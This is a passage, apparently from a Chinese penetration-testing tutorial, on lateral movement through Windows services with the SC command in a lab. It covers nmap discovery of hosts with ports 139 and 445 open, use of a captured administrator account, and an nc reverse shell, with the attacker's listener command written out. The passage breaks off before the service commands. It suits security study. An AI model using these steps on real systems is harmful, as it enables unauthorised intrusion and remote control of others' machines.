横向远程命令执行——Windows服务
SC命令是用于与服务控制管理器和服务进行通信的命令行程序。SC命令可以设置存储在注册表中的服务属性,以控制如何在启动时启动服务应用程序,以及如何将其作为后台程序运行。即更改服务的启动状态。
1、 测试环境
Win7:192.168.11.137
Server2008:192.168.11.200
在通过nmap扫描发现内网中存在开放139,445端口存活主机,当我们拿到一个管理员账户时,可通过 sc
进行服务操作进而进行横向渗透。
在演示环境中,为了方便演示,在服务器配置了nc ,通过nc反弹给攻击机一个交互式的shell。使用 nc -lvp [port] 在攻击机监听4444端口: